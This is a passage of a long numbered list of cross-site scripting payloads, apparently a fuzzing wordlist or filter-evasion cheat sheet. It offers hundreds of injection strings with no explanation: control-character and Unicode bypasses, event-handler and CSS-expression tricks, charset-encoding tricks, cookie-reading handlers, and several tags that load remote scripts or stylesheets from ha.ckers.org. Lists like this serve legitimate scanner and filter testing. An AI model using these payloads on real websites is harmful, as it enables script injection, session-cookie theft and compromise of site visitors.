  355. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  356. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  357. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  358. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  359. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  360. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  361. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  362. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  363. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  364. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  365. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  366. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  367. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  368. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  369. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  370. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  371. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  372. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  373. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  374. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  375. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  376. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  377. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  378. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  379. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  380. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  381. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  382. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  383. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  384. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  385. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  386. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  387. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  388. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  389. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  390. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  391. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  392. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  393. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  394. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  395. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  396. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  397. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  398. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  399. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  400. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  401. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  402. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  403. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  404. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  405. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  406. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  407. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  408. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  409. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  410. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  411. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  412. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  413. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  414. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  415. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  416. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  417. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  418. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  419. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  420. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  421. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  422. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  423. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  424. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  425. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  426. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  427. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  428. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  429. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  430. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  431. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  432. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  433. "`'><script>\x3Bjavascript:alert(1)</script>
  434. "`'><script>\x0Djavascript:alert(1)</script>
  435. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  436. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  437. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  438. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  439. "`'><script>\x09javascript:alert(1)</script>
  440. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  441. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  442. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  443. "`'><script>\x00javascript:alert(1)</script>
  444. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  445. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  446. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  447. "`'><script>\x0Cjavascript:alert(1)</script>
  448. "`'><script>\x2Bjavascript:alert(1)</script>
  449. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  450. "`'><script>-javascript:alert(1)</script>
  451. "`'><script>\x0Ajavascript:alert(1)</script>
  452. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  453. "`'><script>\x7Ejavascript:alert(1)</script>
  454. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  455. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  456. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  457. "`'><script>\xC2\x85javascript:alert(1)</script>
  458. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  459. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  460. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  461. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  462. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  463. "`'><script>\x21javascript:alert(1)</script>
  464. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  465. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  466. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  467. "`'><script>\x0Bjavascript:alert(1)</script>
  468. "`'><script>\x20javascript:alert(1)</script>
  469. "`'><script>\xC2\xA0javascript:alert(1)</script>
  470. "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  471. "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  472. "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  473. "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  474. "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  475. "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  476. "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  477. "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  478. "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  479. <script\x2F>javascript:alert(1)</script>
  480. <script\x20>javascript:alert(1)</script>
  481. <script\x0D>javascript:alert(1)</script>
  482. <script\x0A>javascript:alert(1)</script>
  483. <script\x0C>javascript:alert(1)</script>
  484. <script\x00>javascript:alert(1)</script>
  485. <script\x09>javascript:alert(1)</script>
  486. "><img src=x onerror=javascript:alert(1)>
  487. "><img src=x onerror=javascript:alert('1')>
  488. "><img src=x onerror=javascript:alert("1")>
  489. "><img src=x onerror=javascript:alert(`1`)>
  490. "><img src=x onerror=javascript:alert(('1'))>
  491. "><img src=x onerror=javascript:alert(("1"))>
  492. "><img src=x onerror=javascript:alert((`1`))>
  493. "><img src=x onerror=javascript:alert(A)>
  494. "><img src=x onerror=javascript:alert((A))>
  495. "><img src=x onerror=javascript:alert(('A'))>
  496. "><img src=x onerror=javascript:alert('A')>
  497. "><img src=x onerror=javascript:alert(("A"))>
  498. "><img src=x onerror=javascript:alert("A")>
  499. "><img src=x onerror=javascript:alert((`A`))>
  500. "><img src=x onerror=javascript:alert(`A`)>
  501. `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
  502. `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
  503. `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
  504. `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
  505. `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
  506. `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
  507. `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
  508. <script>javascript:alert(1)<\x00/script>
  509. <img src=# onerror\x3D"javascript:alert(1)" >
  510. <input onfocus=javascript:alert(1) autofocus>
  511. <input onblur=javascript:alert(1) autofocus><input autofocus>
  512. <video poster=javascript:javascript:alert(1)//
  513. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  514. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  515. <video><source onerror="javascript:javascript:alert(1)">
  516. <video onerror="javascript:javascript:alert(1)"><source>
  517. <form><button formaction="javascript:javascript:alert(1)">X
  518. <body oninput=javascript:alert(1)><input autofocus>
  519. <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  520. <frameset onload=javascript:alert(1)>
  521. <table background="javascript:javascript:alert(1)">
  522. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  523. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  524. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  525. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  526. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  527. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
  528. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  529. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  530. <object data="data:text/html;base64,%(base64)s">
  531. <embed src="data:text/html;base64,%(base64)s">
  532. <b <script>alert(1)</script>0
  533. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  534. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  535. <embed src="javascript:alert(1)">
  536. <img src="javascript:alert(1)">
  537. <image src="javascript:alert(1)">
  538. <script src="javascript:alert(1)">
  539. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  540. <? foo="><script>javascript:alert(1)</script>">
  541. <! foo="><script>javascript:alert(1)</script>">
  542. </ foo="><script>javascript:alert(1)</script>">
  543. <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
  544. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
  545. <% foo><x foo="%><script>javascript:alert(1)</script>">
  546. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  547. <img \x00src=x onerror="alert(1)">
  548. <img \x47src=x onerror="javascript:alert(1)">
  549. <img \x11src=x onerror="javascript:alert(1)">
  550. <img \x12src=x onerror="javascript:alert(1)">
  551. <img\x47src=x onerror="javascript:alert(1)">
  552. <img\x10src=x onerror="javascript:alert(1)">
  553. <img\x13src=x onerror="javascript:alert(1)">
  554. <img\x32src=x onerror="javascript:alert(1)">
  555. <img\x47src=x onerror="javascript:alert(1)">
  556. <img\x11src=x onerror="javascript:alert(1)">
  557. <img \x47src=x onerror="javascript:alert(1)">
  558. <img \x34src=x onerror="javascript:alert(1)">
  559. <img \x39src=x onerror="javascript:alert(1)">
  560. <img \x00src=x onerror="javascript:alert(1)">
  561. <img src\x09=x onerror="javascript:alert(1)">
  562. <img src\x10=x onerror="javascript:alert(1)">
  563. <img src\x13=x onerror="javascript:alert(1)">
  564. <img src\x32=x onerror="javascript:alert(1)">
  565. <img src\x12=x onerror="javascript:alert(1)">
  566. <img src\x11=x onerror="javascript:alert(1)">
  567. <img src\x00=x onerror="javascript:alert(1)">
  568. <img src\x47=x onerror="javascript:alert(1)">
  569. <img src=x\x09onerror="javascript:alert(1)">
  570. <img src=x\x10onerror="javascript:alert(1)">
  571. <img src=x\x11onerror="javascript:alert(1)">
  572. <img src=x\x12onerror="javascript:alert(1)">
  573. <img src=x\x13onerror="javascript:alert(1)">
  574. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  575. <img src=x onerror=\x09"javascript:alert(1)">
  576. <img src=x onerror=\x10"javascript:alert(1)">
  577. <img src=x onerror=\x11"javascript:alert(1)">
  578. <img src=x onerror=\x12"javascript:alert(1)">
  579. <img src=x onerror=\x32"javascript:alert(1)">
  580. <img src=x onerror=\x00"javascript:alert(1)">
  581. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  582. <img src="x` `<script>javascript:alert(1)</script>"` `>
  583. <img src onerror /" '"= alt=javascript:alert(1)//">
  584. <title onpropertychange=javascript:alert(1)></title><title title=>
  585. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  586. <!--[if]><script>javascript:alert(1)</script -->
  587. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  588. <script src="/\%(jscript)s"></script>
  589. <script src="\\%(jscript)s"></script>
  590. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  591. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  592. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  593. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  594. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  595. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
  596. <style>*[{}@import'%(css)s?]</style>X
  597. <div style="font-family:'foo&#10;;color:red;';">XXX
  598. <div style="font-family:foo}color=red;">XXX
  599. <// style=x:expression\28javascript:alert(1)\29>
  600. <style>*{x:expression(javascript:alert(1))}</style>
  601. <div style=content:url(%(svg)s)></div>
  602. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  603. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  604. <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  605. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  606. <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  607. <x style="background:url('x&#1;;color:red;/*')">XXX</x>
  608. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  609. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  610. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  611. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  612. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  613. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  614. <meta charset="mac-farsi"script¾javascript:alert(1)¼/script¾
  615. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  616. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  617. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
  618. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
  619. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  620. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
  621. <x style="behavior:url(%(sct)s)">
  622. <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
  623. <event-source src="%(event)s" onload="javascript:alert(1)">
  624. <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  625. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
  626. <script>%(payload)s</script>
  627. <script src=%(jscript)s></script>
  628. <script language='javascript' src='%(jscript)s'></script>
  629. <script>javascript:alert(1)</script>
  630. <IMG SRC="javascript:javascript:alert(1);">
  631. <IMG SRC=javascript:javascript:alert(1)>
  632. <IMG SRC=`javascript:javascript:alert(1)`>
  633. <SCRIPT SRC=%(jscript)s?<B>
  634. <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  635. <BODY ONLOAD=javascript:alert(1)>
  636. <BODY ONLOAD=javascript:javascript:alert(1)>
  637. <IMG SRC="jav ascript:javascript:alert(1);">
  638. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  639. <SCRIPT/SRC="%(jscript)s"></SCRIPT>
  640. <<SCRIPT>%(payload)s//<</SCRIPT>
  641. <IMG SRC="javascript:javascript:alert(1)"
  642. <iframe src=%(scriptlet)s <
  643. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  644. <IMG DYNSRC="javascript:javascript:alert(1)">
  645. <IMG LOWSRC="javascript:javascript:alert(1)">
  646. <BGSOUND SRC="javascript:javascript:alert(1);">
  647. <BR SIZE="&{javascript:alert(1)}">
  648. <LAYER SRC="%(scriptlet)s"></LAYER>
  649. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  650. <STYLE>@import'%(css)s';</STYLE>
  651. <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  652. <XSS STYLE="behavior: url(%(htc)s);">
  653. <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
  654. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  655. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  656. <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  657. <TABLE BACKGROUND="javascript:javascript:alert(1)">
  658. <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  659. <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  660. <DIV STYLE="width:expression(javascript:alert(1));">
  661. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
  662. <XSS STYLE="xss:expression(javascript:alert(1))">
  663. <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  664. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
  665. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  666. <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  667. <BASE HREF="javascript:javascript:alert(1);//">
  668. <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  669. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  670. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  671. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
  672. <SCRIPT SRC="%(jpg)s"></SCRIPT>
  673. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  674. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  675. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  676. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  677. <STYLE>@import'%(css)s';</STYLE>
  678. <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  679. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  680. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  681. <style onreadystatechange=javascript:javascript:alert(1);></style>
  682. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  683. <embed code=%(scriptlet)s></embed>
  684. <embed code=javascript:javascript:alert(1);></embed>
  685. <embed src=%(jscript)s></embed>
  686. <frameset onload=javascript:javascript:alert(1)></frameset>
  687. <object onerror=javascript:javascript:alert(1)>
  688. <embed type="image" src=%(scriptlet)s></embed>
  689. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  690. <IMG SRC=&{javascript:alert(1);};>
  691. <a href="jav&#65ascript:javascript:alert(1)">test1</a>
  692. <a href="jav&#97ascript:javascript:alert(1)">test1</a>
  693. <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
  694. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  695. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
  696. alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
  697. ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  698. '';!--"<XSS>=&{()}
  699. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  700. <IMG SRC="javascript:alert('XSS');">
  701. <IMG SRC=javascript:alert('XSS')>
  702. <IMG SRC=JaVaScRiPt:alert('XSS')>
  703. <IMG SRC=javascript:alert("XSS")>
  704. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  705. <a onmouseover="alert(document.cookie)">xxs link</a>
  706. <a onmouseover=alert(document.cookie)>xxs link</a>
  707. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  708. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  709. <IMG SRC=# onmouseover="alert('xxs')">
  710. <IMG SRC= onmouseover="alert('xxs')">
  711. <IMG onmouseover="alert('xxs')">
  712. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  713. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  714. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  715. <IMG SRC="jav ascript:alert('XSS');">
  716. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  717. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  718. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  719. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  720. <IMG SRC=" &#14; javascript:alert('XSS');">
  721. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  722. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  723. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  724. <<SCRIPT>alert("XSS");//<</SCRIPT>
  725. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  726. <SCRIPT SRC=//ha.ckers.org/.j>
  727. <IMG SRC="javascript:alert('XSS')"
  728. <iframe src=http://ha.ckers.org/scriptlet.html <
  729. \";alert('XSS');//
  730. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  731. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  732. <BODY BACKGROUND="javascript:alert('XSS')">
  733. <IMG DYNSRC="javascript:alert('XSS')">
  734. <IMG LOWSRC="javascript:alert('XSS')">
  735. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  736. <IMG SRC='vbscript:msgbox("XSS")'>
  737. <IMG SRC="livescript:[code]">
  738. <BODY ONLOAD=alert('XSS')>
  739. <BGSOUND SRC="javascript:alert('XSS');">
  740. <BR SIZE="&{alert('XSS')}">
  741. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  742. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  743. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  744. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  745. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  746. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  747. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  748. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  749. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  750. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  751. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  752. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
